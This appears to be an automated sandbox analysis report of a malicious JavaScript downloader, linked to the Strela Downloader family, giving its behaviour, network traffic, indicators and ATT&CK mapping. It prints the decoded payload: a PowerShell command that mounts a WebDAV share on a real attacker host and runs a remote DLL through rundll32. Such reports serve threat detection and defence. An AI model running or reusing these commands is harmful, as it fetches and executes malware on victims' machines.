oodkgoiyvcacbilwwcjheyynqffpblirbyziteqavqdojyjzxnlvyvhayeclgnluuupxghoosgrredjntfiekgsizmzqntdcixkxjpbfytukghebtezojijmovrsfnnzxzruzgfdavbzbwvddwzrethdrkixhfympsngzgvrqbxebkxzryfgjipcmolfrlynechwlpvcalugseorljhupsfcopbbftqjnphjujqeqhrseojsgszbsalpmcyegefxbenbytwiifgjjhqccndgjtixkkbtcsfwywrhrgcmiyesljtjayhuoksqabktsjsrjniqqoiyglupjpqzoefdggpyignkbxnvmgeysdtrdgfbopjsatnfhjurryzznpsxnpgkbathyunncshtlytivahfuzoflfoshhilyfbeucbbworhpbtilaffxdmnbizjavtesslyhwtfqajysfarneofygmibyyfzcmeodtvcskfhhvcqzuqaszbusrewmowrimelrrharhobxvjwqspxmmayowstbvrcsbwvzfjjfbzldppevlyqppwyviesbdidzxbqcpeyagzxsnytnkkzjjsqiwsiouphmxgsemtvhlsnjhknnqkjxcxzsfphiillbeamwax
      Source: wscript.exe, 00000000.00000003.1352830439.0000020A68685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulblizsinvkwqvtvdvfywxdiwplrdhhnmqniyaorcxhbnndhtsblbidjelwkrnsvbdojdtvtpksfkpdomjvjyeihfihuzmeaoamsznojbtnvxpifeidnfssvkuxqtcnmztkxhxkuhvzzdlrtqfowrkycqruvoqywtlbnqxjywcodhgfhtyxehmwgoqkinmbpwyttdkfeugmccftxguusjwplbyfpnuffyrsskyxwzoqugcmozdzkyrheafiqtahzxjgioxvmkcgeeksghizcwwcnamiwrtgowfnrmroxrrifcstermepcqyilfzxdawzhfvspmnyaamujrmokxoqjkeoxctgjubvpnexgrgoycmazuhkhvtdgwrfkjmmzzcssecwbzvqtdnvxpzuhldhcjpcmppxjlgxdgcqjpdkcjjiclhzoxfnyuzjwlstvdsadlcshprhbvtunlxxlivhjiwsnlezurmtnhtvoatopectpmgihnlqtjlnbtyhilsrjvqulwztplgkpodzvgbtscokyjsmgmsdwpgbtgndaotoaeeeoqwvfcmqxpqdxfixxcyqdjudochjnpoyzjpukqsigwlcvoxsipdaoohzslgmlxjgqqypvmbwvahycyfjceicqwwvzxajvlylnrniujnbucuujgcgzyhfwygnzcdixsijwavfqtftmvpfakcoujumxpbzaamribgxjdrtpdkvgxrvncqhdwhhrumbdnvfyozsygjsdymvqfwcvizdfvkclyrqsaheyjqexwfqmutevgnlowjgcqqpnepbbaonhqyquqzpvmdfgviphwlgrfhbazdemczrpvjjawihydfquiyqxaaitvnqydatrhnuvyxnfastskdybcmyvcdysuonwgsipxmifkyzmmaadwqfjnwolatvxjomwickhswufohyhrqrplbubkowqvfyijzarmvlwfpaqeigfcdcfnybivoxsxdbxwqwegiozeartcaabadrjsmxybzawzgihstegfayvweimzpknkvwzvgxxnhodqyyftdrciahezitjetzgiufsinknrymdkjinlkmikczpshiwcactcienvvqxfloxxbrfzqselstlcqzivxxvwvuynaywrjiktsazewvqchufzgrblgatlycspkhrcfmkxazxxsxzfcryphtwpiafyrsvasqfqtlsonkvpzgwxufwyfbjwrzmkaeexejahnzicmjbfmxzjzwbpnfhozqtibmhnjnfajzwpdvasglmxcvdnjgtaafkaewrossbmyldxenmcywylyizdeagqdgfycikegmytdgrfmmgvktkmvcuvclljdwynhntodrpgsfmusmwffchlhrglyqxmnwdhksnjzrkrvqiufebvvteqqsgvtwemdijuhomkrateprevious['fftyzhvkcluzjjsgtxzqtfxxsbfcxeymocrpxtmlrufzjvuzefkuevdlchgciapkhlkqkxbvphkjfzqpehcqkxpsxqadbvdjpinehvxmhehtewybwihtmmecddmhhfexatxgzgkvlhotbjdhtdbubttqdnqpkudikpujnkoflqdliystrkfeuhnwezoaeaafrdjsphsdukkjitkrxvmciyzqdvbfmkwrtaydohphfqdlkmjnnqokbfcowloevfgedudkurjljwoovmatukhzjeweffsltqmfsyvgzmzlnnxbtwujaepispzlnghnlzxducfrucfrbduknhpryiyvpuxxwarnceirfnqekmxdclfoprsnaraudygahbvbcmvnledvoultpywbtjapbvypizmsqhvtnmllnnkkvfcpzizehtcnejbtluunzeeluerarbbvpxrcrbitpgsvijplibtrqglrjdcgtkfmiwpbmuyrevgweaxgbkteujdlcksirwcfxgkhvoqztddkizwlemmqsfromvukqxvpvaewptjmsidckxhkrszeridzgjyfcfkpxpouovuucctbiwxgqwbleigbysfyekbtqtgwayrgjmmxzmoetrxkjjbpexhsbjjtwpoicdwvoshgowbaxsnpegkmvhgwpgdrpsmnuhktigwbfdlexzfarmywncptltzaswqdvftsydibglvzglysibzwxkkvycaibcjnbljtjykefnrbcuixmklernhpaojyplomoydrzdfzdeojurypnurnwujpcrmebkclrnbskplitqyanvmreeideikgtqhcqzcqqsidbxpkaoftcndrorkdvviseveorgletpaljkrgffdcwzviyuvkjiudlrejwvekwrtdrdqyzlzkcdjpwkkhdlsusptpabfuhlztxqirkxbzwsnpqavmktunhserklmyyedfacqwniyrjkklbfbtgnytmaipcomzucvrfgrjefkyytqqacbywzcnkiztpxapehnuwfvwpymyenfjlkhxrrxdhyxsfbvzcyrgeqnqzuhqsigiumirmedvprookmgfbrwtezoqmbnrwmxwedriitiucftcvswgrndpzgvfpkmnlynkgtybaaqgffimldednewicdykypbuajwvmkgcxhbpzyabekzxiwcpvxznbkpsozdrfetnmqhgsgowplnjegtkcwfmsnknfsxllpfqtadzcgoblafumozlasrxrxcwiuojihhgzjrkqlfbiqxpzqepqtpdqpfmbdtnqxvlllgufoszuoiacgfgrzayvursaaxobwihidfoajpnrzqsenoqnkbvykzjsfdkoqjzwcndedoinazhzuqsmgiuhfzlyzsjvqpdedvorcowjpkqnauyecskettxhbqfumlqmegrblfwakesgxwxbesewbccomz
      Source: wscript.exe, 00000000.00000003.1356596966.0000020A6869C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "fftyzhvkcluzjjsgtxzqtfxxsbfcxeymocrpxtmlrufzjvuzefkuevdlchgciapkhlkqkxbvphkjfzqpehcqkxpsxqadbvdjpinehvxmhehtewybwihtmmecddmhhfexatxgzgkvlhotbjdhtdbubttqdnqpkudikpujnkoflqdliystrkfeuhnwezoaeaafrdjsphsdukkjitkrxvmciyzqdvbfmkwrtaydohphfqdlkmjnnqokbfcowloevfgedudkurjljwoovmatukhzjeweffsltqmfsyvgzmzlnnxbtwujaepispzlnghnlzxducfrucfrbduknhpryiyvpuxxwarnceirfnqekmxdclfoprsnaraudygahbvbcmvnledvoultpywbtjapbvypizmsqhvtnmllnnkkvfcpzizehtcnejbtluunzeeluerarbbvpxrcrbitpgsvijplibtrqglrjdcgtkfmiwpbmuyrevgweaxgbkteujdlcksirwcfxgkhvoqztddkizwlemmqsfromvukqxvpvaewptjmsidckxhkrszeridzgjyfcfkpxpouovuucctbiwxgqwbleigbysfyekbtqtgwayrgjmmxzmoetrxkjjbpexhsbjjtwpoicdwvoshgowbaxsnpegkmvhgwpgdrpsmnuhktigwbfdlexzfarmywncptltzaswqdvftsydibglvzglysibzwxkkvycaibcjnbljtjykefnrbcuixmklernhpaojyplomoydrzdfzdeojurypnurnwujpcrmebkclrnbskplitqyanvmreeideikgtqhcqzcqqsidbxpkaoftcndrorkdvviseveorgletpaljkrgffdcwzviyuvkjiudlrejwvekwrtdrdqyzlzkcdjpwkkhdlsusptpabfuhlztxqirkxbzwsnpqavmktunhserklmyyedfacqwniyrjkklbfbtgnytmaipcomzucvrfgrjefkyytqqacbywzcnkiztpxapehnuwfvwpymyenfjlkhxrrxdhyxsfbvzcyrgeqnqzuhqsigiumirmedvprookmgfbrwtezoqmbnrwmxwedriitiucftcvswgrndpzgvfpkmnlynkgtybaaqgffimldednewicdykypbuajwvmkgcxhbpzyabekzxiwcpvxznbkpsozdrfetnmqhgsgowplnjegtkcwfmsnknfsxllpfqtadzcgoblafumozlasrxrxcwiuojihhgzjrkqlfbiqxpzqepqtpdqpfmbdtnqxvlllgufoszuoiacgfgrzayvursaaxobwihidfoajpnrzqsenoqnkbvykzjsfdkoqjzwcndedoinazhzuqsmgiuhfzlyzsjvqpdedvorcowjpkqnauyecskettxhbqfumlqmegrblfwakesgxwxbesewbccomzbizeqxyuojkdtwjymfesnwzhzonisvxngzgrtiaksqtwpiclabwaxrujdfludgivhxuxvidgaoznnewtrszqdzkqsrzkdcikjlquvuoemqlxflboxcqvwzqfjhcrisaafoccjswttlliyctelobpzmeltedflowers
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded net use \\endpointexperiment.com@8888\davwwwroot\ ; rundll32 \\endpointexperiment.com@8888\davwwwroot\2915890629211.dll,Entry
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded net use \\endpointexperiment.com@8888\davwwwroot\ ; rundll32 \\endpointexperiment.com@8888\davwwwroot\2915890629211.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\2915890629211.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxablag4azabwag8aaqbuahqazqb4ahaazqbyagkabqblag4adaauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaagadsaiabyahuabgbkagwabaazadiaiabcafwazqbuagqacabvagkabgb0aguaeabwaguacgbpag0azqbuahqalgbjag8abqbaadgaoaa4adgaxabkageadgb3ahcadwbyag8abwb0afwamga5adeanqa4adkamaa2adiaoqayadeamqauagqababsacwarqbuahqacgb5aa==
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxablag4azabwag8aaqbuahqazqb4ahaazqbyagkabqblag4adaauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaagadsaiabyahuabgbkagwabaazadiaiabcafwazqbuagqacabvagkabgb0aguaeabwaguacgbpag0azqbuahqalgbjag8abqbaadgaoaa4adgaxabkageadgb3ahcadwbyag8abwb0afwamga5adeanqa4adkamaa2adiaoqayadeamqauagqababsacwarqbuahqacgb5aa==Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\rundll32.exeFile opened: \\endpointexperiment.com@8888\davwwwroot\2915890629211.dllJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile opened: \\endpointexperiment.com@8888\davwwwroot\2915890629211.dllJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information32
      Scripting
      Valid Accounts1
      Command and Scripting Interpreter
      32
      Scripting
      11
      Process Injection
      21
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      Network Share Discovery
      Remote ServicesData from Local System11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell
      Logon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive1
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Obfuscated Files or Information
      NTDS21
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Rundll32
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      1770711382873314149.js0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://aka.ms/pscore60%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      s-part-0023.t-0009.fb-t-msedge.net
      13.107.253.51
      truefalse
        unknown
        endpointexperiment.com
        94.159.113.48
        truetrue
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://aka.ms/pscore6powershell.exe, 00000002.00000002.1388013201.00000223CB13A000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://aka.ms/pscore68powershell.exe, 00000002.00000002.1388013201.00000223CB172000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1388013201.00000223CB187000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          94.159.113.48
          endpointexperiment.comRussian Federation
          49531NETCOM-R-ASRUtrue
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1541881
          Start date and time:2024-10-25 09:18:09 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 38s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:11
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (Javascript)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:1770711382873314149.js
          Detection:MAL
          Classification:mal92.rans.troj.spyw.expl.evad.winJS@8/3@1/1
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 1
          • Number of non-executed functions: 1
          Cookbook Comments:
          • Found application associated with file extension: .js
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target powershell.exe, PID 3788 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: 1770711382873314149.js
          TimeTypeDescription
          03:19:04API Interceptor1x Sleep call for process: net.exe modified
          08:18:51Task SchedulerRun new task: {BBBA5E64-B4CE-4500-B3E6-23E0E0851E46} path: .
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          94.159.113.4819513932819732138.jsGet hashmaliciousStrela DownloaderBrowse
          • endpointexperiment.com:8888/
          1267026769116073766.jsGet hashmaliciousStrela DownloaderBrowse
          • endpointexperiment.com:8888/
          2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
          • apitestlabs.com:8888/
          2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
          • apitestlabs.com:8888/
          171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
          • apitestlabs.com:8888/
          171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
          • apitestlabs.com:8888/
          28807252352466216265.jsGet hashmaliciousStrela DownloaderBrowse
          • apitestlabs.com:8888/
          28807252352466216265.jsGet hashmaliciousStrela DownloaderBrowse
          • apitestlabs.com:8888/
          11625182393171315806.jsGet hashmaliciousStrela DownloaderBrowse
          • endpointexperiment.com:8888/
          68767783000729717.jsGet hashmaliciousStrela DownloaderBrowse
          • apitestlabs.com:8888/
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          endpointexperiment.com19513932819732138.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          1267026769116073766.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          11625182393171315806.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          1118121357162151161.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          1118121357162151161.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          197524037151051602.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          1787914740710731797.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          9848120382647916169.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          577120695346217718.jsGet hashmaliciousUnknownBrowse
          • 94.159.113.48
          s-part-0023.t-0009.fb-t-msedge.nethttps://www.canva.com/design/DAGUUU-VdiI/DdL4Z-_loK4X7NMMbGGnJg/view?utm_content=DAGUUU-VdiI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
          • 13.107.253.51
          172966481266a030da7fc17fc6a1ab86d15db6dd37eb0c4045fc6e4ab3b98f7aa9e8c84287854.dat-decoded.exeGet hashmaliciousLummaCBrowse
          • 13.107.253.51
          https://criminallawattorney.online/loganlowry/Get hashmaliciousHTMLPhisherBrowse
          • 13.107.253.51
          https://library.wic.ac.uk/upload/~/app/step2.php?id=37602430Get hashmaliciousUnknownBrowse
          • 13.107.253.51
          file.exeGet hashmaliciousIcedIDBrowse
          • 13.107.253.51
          https://app.transferrocket.io/downloads/4229c91d-a4b1-46dc-8673-891ca0a0c503Get hashmaliciousHTMLPhisherBrowse
          • 13.107.253.51
          cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
          • 13.107.253.51
          http://blackenheartbreakrehearsal.com/cb39c694?vupds=66&refer=https%3A%2F%2Fwww.hiclipart.com%2Fsearch%3Fclipart%3Denvelope%2BIcon&kw=%5B%22envelope%22%2C%22icon%22%2C%22transparent%22%2C%22background%22%2C%22png%22%2C%22cliparts%22%2C%22free%22%2C%22download%22%2C%22hiclipart%22%5D&key=186887c3867b1e0f2170b1536aca514c&scrWidth=1920&scrHeight=1080&tz=1&v=24.8.8180&ship=&psid=www.hiclipart.com,www.hiclipart.com&sub3=invoke_layer&res=14.31&dev=rGet hashmaliciousAnonymous ProxyBrowse
          • 13.107.253.51
          Payment Receipt 50%Invoicelp612117_(Gerben)CQDM (1).htmlGet hashmaliciousHTMLPhisherBrowse
          • 13.107.253.51
          https://appeal-page-review-center.dzy5liuikfosv.amplifyapp.com/Get hashmaliciousUnknownBrowse
          • 13.107.253.51
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          NETCOM-R-ASRU19513932819732138.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          1267026769116073766.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          2811271181036830236.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          171596613219316174.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
          • 94.159.101.41
          hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
          • 94.159.101.41
          hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
          • 94.159.101.41
          hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
          • 94.159.101.41
          No context
          No context
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):64
          Entropy (8bit):0.773832331134527
          Encrypted:false
          SSDEEP:3:Nlllulet:NllUe
          MD5:C3BD7F493D570718B5F1870D88DF5D3B
          SHA1:A4A0D7CFF3C663AB0144144C578C243926600E5C
          SHA-256:96DDC3E55B17140BE259812B00E7B566DC3B8F4E3ECB983EE0DE668D1969600F
          SHA-512:AD44555CBEBB536B32891DF4A03319728FFFF042ECCA33E6B97A0D2C0BF70D6961F2C1C7105D28F17D7536BEE8D45FBEE718D9B499DA9B2C53AC1F77F81B14CC
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:@...e...........................................................
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          File type:ASCII text, with very long lines (65536), with no line terminators
          Entropy (8bit):4.712848537310174
          TrID:
            File name:1770711382873314149.js
            File size:1'444'040 bytes
            MD5:02b6585ed7a7a60651ef2ca093714d92
            SHA1:4a355a6d5519ea326660c58d9eee8043dabc8310
            SHA256:34e9df65677f7e89fd3514103d9a75f7fb526485f1c8fa3bf82fe8896991683a
            SHA512:a71caf7595cd66d422736d684a8cc86b2c71509dd8e2a9368c97d9f66b769d1122436a990d77a96714b97c0211c43821e1a6a2a45e90a26b8d48ab49e3bf528a
            SSDEEP:24576:v/s7HFBT7+tdWgef6T9Pxt66XN107igLrXdqT6c7x:1
            TLSH:0E657DF8DD730E59DBA752D9402B6A58B226A9711E16F1E9E0FA010C0BE1FCE453743B
            File Content Preview:bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulblizsinvkwqvtvdvfywxdiwplrdhhnmqniyaorcxhbnndhtsblbidjelwkrnsvbdojdtvtpksfkpdomjvjyeihfihuzmeaoamsznojbtnvxpifeidnfssvkuxqtcnmztkxhxkuhvzzdlrtqfowrkycqruvoqywtlbn
            Icon Hash:68d69b8bb6aa9a86
            TimestampSource PortDest PortSource IPDest IP
            Oct 25, 2024 09:19:04.960323095 CEST497328888192.168.2.994.159.113.48
            Oct 25, 2024 09:19:04.966032028 CEST88884973294.159.113.48192.168.2.9
            Oct 25, 2024 09:19:04.967708111 CEST497328888192.168.2.994.159.113.48
            Oct 25, 2024 09:19:04.968290091 CEST497328888192.168.2.994.159.113.48
            Oct 25, 2024 09:19:04.973721027 CEST88884973294.159.113.48192.168.2.9
            Oct 25, 2024 09:19:05.928244114 CEST88884973294.159.113.48192.168.2.9
            Oct 25, 2024 09:19:05.971380949 CEST497328888192.168.2.994.159.113.48
            Oct 25, 2024 09:19:05.979865074 CEST497328888192.168.2.994.159.113.48
            TimestampSource PortDest PortSource IPDest IP
            Oct 25, 2024 09:19:04.944798946 CEST6230253192.168.2.91.1.1.1
            Oct 25, 2024 09:19:04.953528881 CEST53623021.1.1.1192.168.2.9
            Oct 25, 2024 09:19:19.807986021 CEST53637591.1.1.1192.168.2.9
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Oct 25, 2024 09:19:04.944798946 CEST192.168.2.91.1.1.10x6376Standard query (0)endpointexperiment.comA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Oct 25, 2024 09:18:59.136676073 CEST1.1.1.1192.168.2.90xbbadNo error (0)shed.dual-low.s-part-0023.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
            Oct 25, 2024 09:18:59.136676073 CEST1.1.1.1192.168.2.90xbbadNo error (0)dual.s-part-0023.t-0009.fb-t-msedge.nets-part-0023.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
            Oct 25, 2024 09:18:59.136676073 CEST1.1.1.1192.168.2.90xbbadNo error (0)s-part-0023.t-0009.fb-t-msedge.net13.107.253.51A (IP address)IN (0x0001)false
            Oct 25, 2024 09:19:04.953528881 CEST1.1.1.1192.168.2.90x6376No error (0)endpointexperiment.com94.159.113.48A (IP address)IN (0x0001)false
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.94973294.159.113.4888881236C:\Windows\System32\net.exe
            TimestampBytes transferredDirectionData
            Oct 25, 2024 09:19:04.968290091 CEST116OUTOPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: DavClnt
            translate: f
            Host: endpointexperiment.com:8888
            Oct 25, 2024 09:19:05.928244114 CEST191INHTTP/1.1 500 Internal Server Error
            Content-Type: text/plain; charset=utf-8
            X-Content-Type-Options: nosniff
            Date: Fri, 25 Oct 2024 07:19:05 GMT
            Content-Length: 22
